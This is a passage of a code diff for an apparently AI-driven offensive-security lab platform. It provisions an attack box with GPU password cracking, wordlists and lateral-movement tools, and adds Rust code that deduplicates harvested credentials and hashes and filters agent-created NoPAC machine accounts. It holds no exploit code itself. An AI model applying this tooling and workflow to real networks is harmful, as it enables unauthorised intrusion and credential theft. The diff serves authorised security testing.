+dependencies = [
+ "linked-hash-map",
+]
+
[[package]]
name = "lru-slab"
version = "0.1.2"
@@ -2261,6 +2354,12 @@ dependencies = [
"web-sys",
]
+[[package]]
+name = "resolv-conf"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e061d1b48cb8d38042de4ae0a7a6401009d6143dc80d2e2d6f31f0bdd6470c7"
+
[[package]]
name = "ring"
version = "0.17.14"
@@ -3615,13 +3714,19 @@ dependencies = [
"wasite",
]
+[[package]]
+name = "widestring"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72069c3113ab32ab29e5584db3c6ec55d416895e60715417b5b883a357c3e471"
+
[[package]]
name = "winapi-util"
version = "0.1.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
dependencies = [
- "windows-sys 0.48.0",
+ "windows-sys 0.61.2",
]
[[package]]
@@ -3665,6 +3770,17 @@ version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
+[[package]]
+name = "windows-registry"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720"
+dependencies = [
+ "windows-link",
+ "windows-result",
+ "windows-strings",
+]
+
[[package]]
name = "windows-result"
version = "0.4.1"
diff --git a/Cargo.toml b/Cargo.toml
index 3404af61..784d77f6 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -18,6 +18,7 @@ serde_yaml = "0.9"
regex = "1"
sqlx = { version = "0.8", features = ["runtime-tokio", "postgres", "chrono", "json", "uuid"] }
tera = "1"
+hickory-resolver = { version = "0.24", default-features = false, features = ["tokio-runtime", "system-config"] }
# OpenTelemetry
opentelemetry = "0.31"
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 878b9d8b..d9b81157 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -26,6 +26,7 @@ includes:
LOG_DIR: '{{.LOG_DIR}}'
REPORT_DIR: '{{.REPORT_DIR}}'
GRAFANA_URL: '{{.GRAFANA_URL}}'
+ LOKI_URL: '{{.LOKI_URL}}'
DREADNODE_SERVER_URL: '{{.DREADNODE_SERVER_URL}}'
DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION}}'
DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE}}'
@@ -51,6 +52,7 @@ includes:
ARES_CONFIG: '{{.ARES_CONFIG}}'
OTEL_TRACES_ENDPOINT: '{{.OTEL_TRACES_ENDPOINT}}'
ALLOY_LOKI_ENDPOINT: '{{.ALLOY_LOKI_ENDPOINT}}'
+ LOKI_URL: '{{.LOKI_URL}}'
blue:
taskfile: .taskfiles/blue/Taskfile.yaml
optional: true
@@ -76,6 +78,7 @@ vars:
# MODEL: '{{.MODEL | default "claude-sonnet-4-5-20250929"}}'
MODEL: '{{.MODEL | default "gpt-5.2"}}'
GRAFANA_URL: '{{.GRAFANA_URL}}'
+ LOKI_URL: '{{.LOKI_URL | default "https://loki.dev.plundr.ai"}}'
POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}'
MAX_STEPS_BLUE: '{{.MAX_STEPS_BLUE | default "50"}}'
MAX_STEPS_BLUE_ONCE: '{{.MAX_STEPS_BLUE_ONCE | default "15"}}' # ~15 min max for once mode
diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml
index 2cc04435..7a30c485 100644
--- a/ansible/playbooks/ares/goad_attack_box.yml
+++ b/ansible/playbooks/ares/goad_attack_box.yml
@@ -32,7 +32,7 @@
alloy_deployment_name: "goad-attack-box"
alloy_server_id: ""
alloy_instance_id: ""
- alloy_loki_endpoint: "{{ alloy_loki_endpoint }}"
+ alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}"
alloy_version: "1.10.1"
# Python version
@@ -45,6 +45,12 @@
cracking_tools_gpu_support: true
cracking_tools_hashcat_from_source: true
cracking_tools_nvidia_opencl_icd: true
+ # Bake the kernel-mode NVIDIA driver + CUDA into the image. Without these,
+ # hashcat on g4dn (T4) reports "OpenCL platform not found" and falls back
+ # to john-on-CPU, which is too slow to feed credential cracks back into
+ # the orchestrator within an op's budget.
+ cracking_tools_install_nvidia_driver: true
+ cracking_tools_install_cuda_toolkit: true
cracking_tools_wordlists:
- rockyou
- seclists_passwords
@@ -113,9 +119,14 @@
changed_when: true
roles:
- # AWS infrastructure agents
+ # AWS infrastructure agents — skipped on non-AWS clouds because they
+ # require the EC2 instance metadata service (cloudwatch-agent's
+ # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build
+ # on Azure).
- role: dreadnode.nimbus_range.aws_ssm_agent
+ when: cloud_provider | default('aws') == 'aws'
- role: dreadnode.nimbus_range.aws_cloudwatch_agent
+ when: cloud_provider | default('aws') == 'aws'
# Base Ares requirements
- role: dreadnode.nimbus_range.base
diff --git a/ansible/roles/base/README.md b/ansible/roles/base/README.md
index 6c13b679..a4449559 100644
--- a/ansible/roles/base/README.md
+++ b/ansible/roles/base/README.md
@@ -34,10 +34,9 @@ Base requirements for Ares AI agents
| `base_pip_packages.0` | str | python-dotenv | No description |
| `base_pip_packages.1` | str | rigging>=3.0 | No description |
| `base_pip_packages.2` | str | pydantic | No description |
-| `base_pip_packages.3` | str | asyncio | No description |
-| `base_pip_packages.4` | str | aiohttp>=3.13.4 | No description |
-| `base_pip_packages.5` | str | cryptography>=44.0.1 | No description |
-| `base_pip_packages.6` | str | requests>=2.33.0 | No description |
+| `base_pip_packages.3` | str | aiohttp>=3.13.4 | No description |
+| `base_pip_packages.4` | str | cryptography>=44.0.1 | No description |
+| `base_pip_packages.5` | str | requests>=2.33.0 | No description |
| `base_pip_externally_managed` | bool | False | No description |
| `base_pip_break_required` | bool | False | No description |
| `base_system_packages` | list | [] | No description |
@@ -140,7 +139,10 @@ Base requirements for Ares AI agents
- **Fail when break-system-packages is required but disabled** (ansible.builtin.fail) - Conditional
- **Fail when break-system-packages is required but unsupported by pip** (ansible.builtin.fail) - Conditional
- **Upgrade pip to latest (CVE fixes)** (ansible.builtin.command)
-- **Install Ares Python dependencies** (ansible.builtin.pip)
+- **Install Ares Python dependencies (with full log)** (ansible.builtin.shell)
+- **Show pip install log tail on failure** (ansible.builtin.command) - Conditional
+- **Print pip install tail** (ansible.builtin.debug) - Conditional
+- **Fail if pip install failed** (ansible.builtin.fail) - Conditional
- **Create Ares workspace directory** (ansible.builtin.file) - Conditional
### main.yml
diff --git a/ansible/roles/base/defaults/main.yml b/ansible/roles/base/defaults/main.yml
index 6588b5a0..e366f5da 100644
--- a/ansible/roles/base/defaults/main.yml
+++ b/ansible/roles/base/defaults/main.yml
@@ -28,11 +28,14 @@ base_rust_install_script: "https://sh.rustup.rs"
base_install_pipx: true
# Ares Python dependencies (installed via pip)
+# Do NOT add `asyncio` here — Python 3.4+ ships asyncio in the stdlib. The
+# PyPI `asyncio` package is a 2015-era stub that ships an `asyncio.py` into
+# site-packages, shadowing the stdlib module and breaking any import of
+# asyncio (including the rest of this pip install run on Python 3.13).
base_pip_packages:
- python-dotenv
- "rigging>=3.0"
- pydantic
- - asyncio
- "aiohttp>=3.13.4"
- "cryptography>=44.0.1"
- "requests>=2.33.0"
diff --git a/ansible/roles/base/tasks/linux.yml b/ansible/roles/base/tasks/linux.yml
index 62d42782..4b7350ab 100644
--- a/ansible/roles/base/tasks/linux.yml
+++ b/ansible/roles/base/tasks/linux.yml
@@ -142,16 +142,50 @@
become: true
changed_when: false
-- name: Install Ares Python dependencies
- ansible.builtin.pip:
- name: "{{ base_pip_packages }}"
- state: present
- executable: "{{ base_pip_executable }}"
- extra_args: >-
- {{ '--break-system-packages' if base_pip_break_required else '' }}
- {{ '--ignore-installed' if ansible_facts['os_family'] == 'Debian' else '' }}
+# Run pip directly via shell so we can tee stdout+stderr to a log file. The
+# ansible.builtin.pip module captures output into a single `msg` field that
+# is too large for CloudWatch's per-event size limit on this dep tree
+# (rigging pulls 100+ transitives), so failures show up as a truncated stdout
+# with no stderr or rc visible. The tee'd log lets the next task surface the
+# real error.
+#
+# `--ignore-installed` is required: Kali ships several Python deps via apt
+# (python3-requests, python3-cryptography, python3-urllib3, python3-yaml).
+# apt-installed packages have no pip RECORD file, so pip's normal upgrade
+# path fails with `uninstall-no-record-file` ("The package was installed
+# by debian"). `--ignore-installed` skips uninstall and overwrites in place.
+- name: Install Ares Python dependencies (with full log)
+ ansible.builtin.shell:
+ cmd: |
+ set -o pipefail
+ {{ base_pip_executable }} install \
+ {{ '--break-system-packages' if base_pip_break_required else '' }} \
+ --ignore-installed \
+ --no-color \
+ {{ base_pip_packages | map('quote') | join(' ') }} \
+ 2>&1 | tee /tmp/ares-pip-install.log
+ executable: /bin/bash
+ become: true
+ register: base_pip_install_result
+ changed_when: false
+ failed_when: false
+
+- name: Show pip install log tail on failure
+ ansible.builtin.command: tail -120 /tmp/ares-pip-install.log
become: true
+ register: base_pip_install_tail
changed_when: false
+ when: base_pip_install_result.rc != 0
+
+- name: Print pip install tail
+ ansible.builtin.debug:
+ var: base_pip_install_tail.stdout_lines
+ when: base_pip_install_result.rc != 0
+
+- name: Fail if pip install failed
+ ansible.builtin.fail:
+ msg: "pip install failed (rc={{ base_pip_install_result.rc }}); see tail above"
+ when: base_pip_install_result.rc != 0
- name: Create Ares workspace directory
ansible.builtin.file:
diff --git a/ansible/roles/cracking_tools/README.md b/ansible/roles/cracking_tools/README.md
index 6c12b795..29795586 100644
--- a/ansible/roles/cracking_tools/README.md
+++ b/ansible/roles/cracking_tools/README.md
@@ -53,6 +53,17 @@ Install and configure password cracking tools for Ares agents
| `cracking_tools_opencl_packages.1` | str | opencl-headers | No description |
| `cracking_tools_opencl_packages.2` | str | clinfo | No description |
| `cracking_tools_nvidia_opencl_icd` | bool | False | No description |
+| `cracking_tools_install_nvidia_driver` | bool | False | No description |
+| `cracking_tools_install_cuda_toolkit` | bool | False | No description |
+| `cracking_tools_nvidia_driver_packages` | list | [] | No description |
+| `cracking_tools_nvidia_driver_packages.0` | str | linux-headers-cloud-amd64 | No description |
+| `cracking_tools_nvidia_driver_packages.1` | str | dkms | No description |
+| `cracking_tools_nvidia_driver_packages.2` | str | firmware-misc-nonfree | No description |
+| `cracking_tools_nvidia_driver_packages.3` | str | nvidia-driver | No description |
+| `cracking_tools_nvidia_driver_packages.4` | str | nvidia-opencl-icd | No description |
+| `cracking_tools_nvidia_driver_packages.5` | str | nvidia-opencl-common | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages` | list | [] | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages.0` | str | nvidia-cuda-toolkit | No description |
| `cracking_tools_update_cache` | bool | True | No description |
## Tasks
@@ -94,9 +105,17 @@ Install and configure password cracking tools for Ares agents
- **Set DEBIAN_FRONTEND to noninteractive** (ansible.builtin.lineinfile) - Conditional
- **Update apt cache** (ansible.builtin.apt) - Conditional
- **Create wordlist directory** (ansible.builtin.file)
+- **Install NVIDIA driver and OpenCL runtime (with full log)** (ansible.builtin.shell) - Conditional
+- **Show NVIDIA install log tail on failure** (ansible.builtin.command) - Conditional
+- **Print NVIDIA install tail** (ansible.builtin.debug) - Conditional
+- **Fail if NVIDIA install failed** (ansible.builtin.fail) - Conditional
+- **Install NVIDIA CUDA toolkit** (ansible.builtin.apt) - Conditional
- **Install GPU support packages** (ansible.builtin.apt) - Conditional
- **Create OpenCL vendors directory** (ansible.builtin.file) - Conditional
- **Register NVIDIA OpenCL ICD** (ansible.builtin.copy) - Conditional
+- **Verify NVIDIA driver (non-fatal — no GPU on builder hosts)** (ansible.builtin.command) - Conditional
+- **Verify OpenCL platform discovery (non-fatal)** (ansible.builtin.command) - Conditional
+- **Show GPU/OpenCL detection summary** (ansible.builtin.debug) - Conditional
- **Ensure libgcc runtime is present for hashcat** (block) - Conditional
- **Install primary libgcc package** (ansible.builtin.apt)
- **Ensure libgcc static archive is present for hashcat** (block) - Conditional
diff --git a/ansible/roles/cracking_tools/defaults/main.yml b/ansible/roles/cracking_tools/defaults/main.yml
index 4fe3e9b7..af1d326c 100644
--- a/ansible/roles/cracking_tools/defaults/main.yml
+++ b/ansible/roles/cracking_tools/defaults/main.yml
@@ -50,4 +50,35 @@ cracking_tools_opencl_packages:
# Set to true when using nvidia/cuda base image to register NVIDIA OpenCL ICD
cracking_tools_nvidia_opencl_icd: false
+# Install the NVIDIA kernel-mode driver + OpenCL runtime on the host. Required
+# on bare-metal/AMI builds (g4dn etc.) where the Kali base image ships without
+# any NVIDIA bits — without this hashcat reports "OpenCL platform not found".
+# Leave false for container builds: the nvidia/cuda runtime base image
+# already provides libnvidia-opencl/libcuda, and the kernel module comes
+# from the host via nvidia-container-toolkit.
+cracking_tools_install_nvidia_driver: false
+# Install the full CUDA toolkit so hashcat can use the CUDA backend (faster
+# than OpenCL on T4/A10/etc.). Pulls ~3GB; only enable on AMI builds.
+cracking_tools_install_cuda_toolkit: false
+# Recommends are intentionally enabled — DKMS, libcuda1, and the kernel
+# module build chain come in via Recommends on Debian/Kali.
+# Kali AMIs ship `+kali-cloud-amd64` kernel — needs the `cloud` headers
+# meta-package. We pull driver + open-source kernel module from NVIDIA's
+# CUDA Debian repo (added in tasks/linux.yml) because Kali's archive
+# nvidia-driver (550.163.01) does not build against kernel 6.19+.
+# `nvidia-kernel-open-dkms` is required for Turing+ (T4 included) on
+# modern kernels; legacy `nvidia-kernel-dkms` is a dead-end here. Pair it
+# with `nvidia-driver-cuda` (CUDA-only userspace) — the `cuda-drivers`
+# meta and full `nvidia-driver` both pull `nvidia-kernel-dkms` (closed
+# kernel module), which Conflicts with the open variant.
+cracking_tools_nvidia_driver_packages:
+ - linux-headers-cloud-amd64
+ - dkms
+ - firmware-misc-nonfree
+ - nvidia-kernel-open-dkms
+ - nvidia-driver-cuda
+ - nvidia-opencl-icd
+cracking_tools_nvidia_cuda_toolkit_packages:
+ - nvidia-cuda-toolkit
+
cracking_tools_update_cache: true
diff --git a/ansible/roles/cracking_tools/tasks/linux.yml b/ansible/roles/cracking_tools/tasks/linux.yml
index 551746d3..367f9d24 100644
--- a/ansible/roles/cracking_tools/tasks/linux.yml
+++ b/ansible/roles/cracking_tools/tasks/linux.yml
@@ -24,6 +24,131 @@
mode: '0755'
become: true
+# Kali rolling ships kernel 6.19.x, which the Kali archive's NVIDIA driver
+# (550.163.01) cannot compile against — DKMS exits 2. NVIDIA's official
+# CUDA Debian repo carries 575+ which supports modern kernels and offers
+# `nvidia-open-kernel-dkms` (open-source kernel module) for Turing+ GPUs.
+# We add this repo first so the apt install below resolves to fresh
+# packages instead of the stale Kali ones.
+- name: Add NVIDIA CUDA apt repository (Kali ships 550.x which fails on kernel 6.19+)
+ ansible.builtin.shell: |
+ set -euxo pipefail
+ cd /tmp
+ curl -fsSLo cuda-keyring.deb \
+ https://developer.download.nvidia.com/compute/cuda/repos/debian13/x86_64/cuda-keyring_1.1-1_all.deb
+ apt-get install -y ./cuda-keyring.deb
+ apt-get update -q
+ rm -f cuda-keyring.deb
+ args:
+ creates: /usr/share/keyrings/cuda-archive-keyring.gpg
+ executable: /bin/bash
+ become: true
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+# Install kernel headers + dkms FIRST in their own apt transaction, so they
+# are fully configured before NVIDIA's dpkg postinst runs `dkms autoinstall`.
+# When mixed in a single apt-get call, dpkg may configure
+# `nvidia-kernel-open-dkms` before `linux-headers-cloud-amd64` finishes
+# setting up, and DKMS exits 2 because the headers aren't yet in place.
+- name: Install kernel headers and DKMS prerequisites
+ ansible.builtin.apt:
+ name:
+ - linux-headers-cloud-amd64
+ - dkms
+ - build-essential
+ - firmware-misc-nonfree
+ state: present
+ install_recommends: true
+ become: true
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+# Driven through shell+tee instead of ansible.builtin.apt: the apt module
+# captures dpkg stderr but truncates large stdout (DKMS kernel-module build
+# errors land deep in apt-get's output, well after the cutoff). With tee we
+# can show the real error on failure.
+- name: Install NVIDIA driver and OpenCL runtime (with full log)
+ ansible.builtin.shell:
+ cmd: |
+ set -o pipefail
+ DEBIAN_FRONTEND=noninteractive apt-get install -y \
+ -o Dpkg::Options::=--force-confdef \
+ -o Dpkg::Options::=--force-confold \
+ -o APT::Install-Recommends=yes \
+ {{ cracking_tools_nvidia_driver_packages | map('quote') | join(' ') }} \
+ 2>&1 | tee /tmp/ares-nvidia-install.log
+ executable: /bin/bash
+ become: true
+ register: cracking_tools_nvidia_install_result
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+- name: Show NVIDIA install log tail on failure
+ ansible.builtin.command: tail -200 /tmp/ares-nvidia-install.log
+ become: true
+ register: cracking_tools_nvidia_install_tail
+ changed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Print NVIDIA install tail
+ ansible.builtin.debug:
+ var: cracking_tools_nvidia_install_tail.stdout_lines
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Dump DKMS make.log on failure
+ ansible.builtin.shell: |
+ set +e
+ for f in /var/lib/dkms/nvidia/*/build/make.log; do
+ echo "==== $f ===="
+ tail -150 "$f" 2>&1 || true
+ done
+ echo "==== build env ===="
+ which gcc cc make 2>&1 || true
+ gcc --version 2>&1 || true
+ dpkg -l build-essential gcc make 2>&1 | tail -10 || true
+ args:
+ executable: /bin/bash
+ register: cracking_tools_dkms_make_log
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Print DKMS make.log
+ ansible.builtin.debug:
+ var: cracking_tools_dkms_make_log.stdout_lines
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Fail if NVIDIA install failed
+ ansible.builtin.fail:
+ msg: "NVIDIA driver install failed (rc={{ cracking_tools_nvidia_install_result.rc }}); see tail above"
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Install NVIDIA CUDA toolkit
+ ansible.builtin.apt:
+ name: "{{ cracking_tools_nvidia_cuda_toolkit_packages }}"
+ state: present
+ install_recommends: true
+ become: true
+ when:
+ - cracking_tools_install_cuda_toolkit | bool
+ - ansible_facts['os_family'] == 'Debian'
+
- name: Install GPU support packages
ansible.builtin.apt:
name: "{{ cracking_tools_opencl_packages }}"
@@ -51,6 +176,33 @@
- cracking_tools_gpu_support | bool
- cracking_tools_nvidia_opencl_icd | default(false) | bool
+# nvidia-smi/clinfo will return non-zero on a CPU-only AMI builder (no GPU
+# attached) — that's expected. The check is purely informational so a logged
+# failure on the first GPU boot is easy to spot.
+- name: Verify NVIDIA driver (non-fatal — no GPU on builder hosts)
+ ansible.builtin.command: nvidia-smi
+ register: cracking_tools_nvidia_smi
+ changed_when: false
+ failed_when: false
+ when: cracking_tools_install_nvidia_driver | bool
+
+- name: Verify OpenCL platform discovery (non-fatal)
+ ansible.builtin.command: clinfo -l
+ register: cracking_tools_clinfo
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_gpu_support | bool
+ - cracking_tools_install_nvidia_driver | bool
+
+- name: Show GPU/OpenCL detection summary
+ ansible.builtin.debug:
+ msg:
+ - "nvidia-smi rc={{ cracking_tools_nvidia_smi.rc | default('skipped') }}"
+ - "clinfo rc={{ cracking_tools_clinfo.rc | default('skipped') }}"
+ - "{{ cracking_tools_clinfo.stdout | default('clinfo not run') }}"
+ when: cracking_tools_install_nvidia_driver | bool
+
- name: Ensure libgcc runtime is present for hashcat
when:
- cracking_tools_install_hashcat
diff --git a/ansible/roles/lateral_movement_tools/README.md b/ansible/roles/lateral_movement_tools/README.md
index 8d194ff0..690de5fd 100644
--- a/ansible/roles/lateral_movement_tools/README.md
+++ b/ansible/roles/lateral_movement_tools/README.md
@@ -118,7 +118,7 @@ Install and configure lateral movement and credential extraction tools for Ares
- **Create symlink for ffitarget.h in standard include path** (ansible.builtin.file) - Conditional
- **Install rubyzip gem for evil-winrm dependency** (community.general.gem) - Conditional
- **Install evil-winrm gem (Ubuntu only, Kali uses apt)** (community.general.gem) - Conditional
-- **Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)** (ansible.builtin.command) - Conditional
+- **Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)** (ansible.builtin.command) - Conditional
- **Install pth-toolkit (Kali only - may not be available in all repos)** (ansible.builtin.apt) - Conditional
- **Warn if pth-toolkit installation failed** (ansible.builtin.debug) - Conditional
- **Install Impacket from source for lateral movement tools** (ansible.builtin.include_tasks) - Conditional
diff --git a/ansible/roles/lateral_movement_tools/tasks/linux.yml b/ansible/roles/lateral_movement_tools/tasks/linux.yml
index 5ca9c59f..3abc6318 100644
--- a/ansible/roles/lateral_movement_tools/tasks/linux.yml
+++ b/ansible/roles/lateral_movement_tools/tasks/linux.yml
@@ -229,12 +229,25 @@
- ansible_facts['distribution'] != 'Kali'
- lateral_movement_tools_install_evil_winrm
-- name: Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)
- ansible.builtin.command: gem update net-imap resolv rexml uri zlib
+# `gem update` is skipped on Kali: evil-winrm ships via apt and Kali tracks
+# CVE patches for net-imap/rexml/uri/zlib through its `ruby-*` debs. On
+# AMI builders, `gem update` here also tends to SIGKILL (rc=-9) inside the
+# Image Builder runner regardless of `--no-document`, so we keep it
+# best-effort with `failed_when: false` and limit it to non-Kali Debian.
+- name: Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)
+ ansible.builtin.command: gem update --no-document {{ item }}
become: true
changed_when: true
+ failed_when: false
+ loop:
+ - net-imap
+ - resolv
+ - rexml
+ - uri
+ - zlib
when:
- ansible_facts['os_family'] == 'Debian'
+ - ansible_facts['distribution'] != 'Kali'
- lateral_movement_tools_install_evil_winrm
- name: Install pth-toolkit (Kali only - may not be available in all repos)
diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml
index ba2f93bf..7f4ff676 100644
--- a/ares-cli/Cargo.toml
+++ b/ares-cli/Cargo.toml
@@ -32,6 +32,7 @@ regex = { workspace = true }
dotenvy = "0.15"
async-trait = "0.1"
thiserror = { workspace = true }
+hickory-resolver = { workspace = true }
[build-dependencies]
serde = { version = "1", features = ["derive"] }
diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs
index d31ae140..416d0401 100644
--- a/ares-cli/src/dedup/credentials.rs
+++ b/ares-cli/src/dedup/credentials.rs
@@ -5,7 +5,7 @@ use std::sync::LazyLock;
use ares_core::models::Credential;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
/// Strip ANSI escape sequences from text.
pub(super) static RE_ANSI: LazyLock =
@@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec) {
if username.starts_with("evil") && username.ends_with('$') {
return false;
}
+ if is_ghost_machine_account(&username) {
+ return false;
+ }
true
});
}
diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs
index b0bd5a0c..82818add 100644
--- a/ares-cli/src/dedup/domains.rs
+++ b/ares-cli/src/dedup/domains.rs
@@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains(
{
let mut valid_domains: HashSet = HashSet::new();
+ let mut host_fqdns: HashSet = HashSet::new();
if let Some(td) = target_domain {
valid_domains.insert(td.to_lowercase());
}
for host in hosts {
if !host.hostname.is_empty() && host.hostname.contains('.') {
let lower = host.hostname.to_lowercase();
+ host_fqdns.insert(lower.clone());
let parts: Vec<&str> = lower.split('.').collect();
if parts.len() > 1 {
valid_domains.insert(parts[1..].join("."));
@@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains(
}
for user in users {
if !user.domain.is_empty() {
- valid_domains.insert(user.domain.to_lowercase());
+ let d = user.domain.to_lowercase();
+ // Skip user.domain values that are actually a host FQDN —
+ // some parsers misattribute and assign the DC's FQDN as the
+ // user's AD domain, which would otherwise let the FQDN survive
+ // the retain() filter below as a phantom "domain".
+ if !host_fqdns.contains(&d) {
+ valid_domains.insert(d);
+ }
}
}
- domains.retain(|d| valid_domains.contains(&d.to_lowercase()));
+ domains.retain(|d| {
+ let lower = d.to_lowercase();
+ valid_domains.contains(&lower) && !host_fqdns.contains(&lower)
+ });
}
}
diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs
index 184bbec8..26c84e1f 100644
--- a/ares-cli/src/dedup/hashes.rs
+++ b/ares-cli/src/dedup/hashes.rs
@@ -1,9 +1,9 @@
-use std::collections::HashSet;
+use std::collections::{HashMap, HashSet};
use ares_core::models::Hash;
use super::credentials::strip_ansi;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
fn normalize_hash_type(hash_type: &str) -> String {
match hash_type.trim().to_lowercase().as_str() {
@@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String {
}
pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec {
- let mut seen = HashSet::new();
- let mut result = Vec::new();
+ // First pass: for each (username, hash_type, hash_value), remember the longest
+ // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once
+ // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and
+ // without this lookup the keyed-by-domain dedup keeps both as separate rows.
+ let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new();
for h in hashes {
let domain = strip_trailing_dot(h.domain.trim()).to_lowercase();
- let hash_value = strip_ansi(&h.hash_value);
+ if domain.is_empty() {
+ continue;
+ }
let key = (
- domain.clone(),
h.username.trim().to_lowercase(),
h.hash_type.trim().to_lowercase(),
- hash_value.trim().to_lowercase(),
+ strip_ansi(&h.hash_value).trim().to_lowercase(),
);
+ domain_lookup
+ .entry(key)
+ .and_modify(|d| {
+ if domain.len() > d.len() {
+ *d = domain.clone();
+ }
+ })
+ .or_insert(domain);
+ }
+
+ let mut seen = HashSet::new();
+ let mut result = Vec::new();
+ for h in hashes {
+ let username = strip_ansi(&h.username);
+ if is_ghost_machine_account(&username) {
+ continue;
+ }
+ let username_l = h.username.trim().to_lowercase();
+ let hash_type_l = h.hash_type.trim().to_lowercase();
+ let hash_value = strip_ansi(&h.hash_value);
+ let hash_value_l = hash_value.trim().to_lowercase();
+
+ let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase();
+ if domain.is_empty() {
+ if let Some(d) = domain_lookup.get(&(
+ username_l.clone(),
+ hash_type_l.clone(),
+ hash_value_l.clone(),
+ )) {
+ domain.clone_from(d);
+ }
+ }
+
+ let key = (domain.clone(), username_l, hash_type_l, hash_value_l);
if seen.insert(key) {
let mut cleaned = h.clone();
- cleaned.domain = strip_trailing_dot(cleaned.domain.trim()).to_lowercase();
+ cleaned.domain = domain;
cleaned.hash_type = normalize_hash_type(&cleaned.hash_type);
cleaned.hash_value = hash_value.trim().to_string();
cleaned.username = strip_ansi(&cleaned.username);
diff --git a/ares-cli/src/dedup/mod.rs b/ares-cli/src/dedup/mod.rs
index 9ae3550e..78f78211 100644
--- a/ares-cli/src/dedup/mod.rs
+++ b/ares-cli/src/dedup/mod.rs
@@ -7,9 +7,32 @@ pub(crate) mod users;
#[cfg(test)]
mod tests;
-/// Strip trailing DNS root dot from domain strings (e.g. `child.contoso.local.` → `child.contoso.local`).
+use regex::Regex;
+use std::sync::LazyLock;
+
+/// Strip trailing DNS root dot and NetExec "0." artifact from domain strings
+/// (e.g. `child.contoso.local.` → `child.contoso.local`,
+/// `contoso.local0` → `contoso.local`).
pub(super) fn strip_trailing_dot(s: &str) -> &str {
- s.strip_suffix('.').unwrap_or(s)
+ let s = s.trim_end_matches('.');
+ // NetExec sometimes appends "0" to domain TLDs. Strip if the char
+ // before the trailing 0 is alphabetic (i.e. TLD-like, not "host10").
+ match s.strip_suffix('0') {
+ Some(clean) if clean.ends_with(|c: char| c.is_ascii_alphabetic()) => clean,
+ _ => s,
+ }
+}
+
+/// Auto-generated Windows hostname pattern (`WIN-` + 11 alphanumerics + optional `$`).
+/// Used to filter ghost machine accounts that the agent created itself via
+/// NoPAC / MachineAccountQuota — not real lab hosts, just our own residue.
+static GHOST_MACHINE_ACCOUNT_RE: LazyLock =
+ LazyLock::new(|| Regex::new(r"(?i)^WIN-[A-Z0-9]{11}\$?$").unwrap());
+
+/// True if `username` looks like an auto-generated Windows machine account
+/// (e.g. `WIN-G9FWV8ZNSCL$`) — typically agent-created via NoPAC.
+pub(crate) fn is_ghost_machine_account(username: &str) -> bool {
+ GHOST_MACHINE_ACCOUNT_RE.is_match(username.trim())
}
pub(crate) use credentials::{dedup_credentials, sanitize_credentials};
diff --git a/ares-cli/src/dedup/tests.rs b/ares-cli/src/dedup/tests.rs
index 37741985..2570f229 100644
--- a/ares-cli/src/dedup/tests.rs
+++ b/ares-cli/src/dedup/tests.rs
@@ -361,6 +361,25 @@ fn strip_trailing_dot_removes_dot() {
assert_eq!(strip_trailing_dot("."), "");
}
+#[test]
